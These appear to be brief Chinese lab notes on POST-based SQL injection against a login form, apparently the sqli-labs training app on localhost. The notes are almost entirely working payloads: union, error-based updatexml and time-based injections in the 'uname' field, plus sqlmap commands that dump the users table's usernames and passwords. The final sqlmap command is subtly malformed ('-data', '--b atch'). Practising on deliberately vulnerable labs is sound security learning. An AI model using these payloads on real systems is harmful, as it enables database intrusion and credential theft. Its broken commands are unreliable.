已经显示输入框了,说明是POST提交方式的注入
uname=admin' order by 2#&passwd=&submit=Submit 正常 uname=admin' order by 3#&passwd=&submit=Submit 不正常
payload直接查出数据库所有数据
uname=-admin' union select group_concat(username,password),2 from users#&passwd=&submit=Submit
uname=-admin") union select group_concat(username,password),2 from users#&passwd=&submit=Submit
uname=') and (updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))#&passwd=&submit=Submit
uname=" and (updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))#&passwd=&submit=Submit
uname=admin") and sleep(10)#&passwd=1&submit=Submit
如果要指定参数注入检测可以将该参数修改成*
sqlmap -r "1.txt" -p uname -D security -T users -C username,password --dump --technique ES --batch --threads 10
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-15/" -data "uname=admin&passwd=admin&submit=Submit" --b atch --threads 10 --technique T --dbs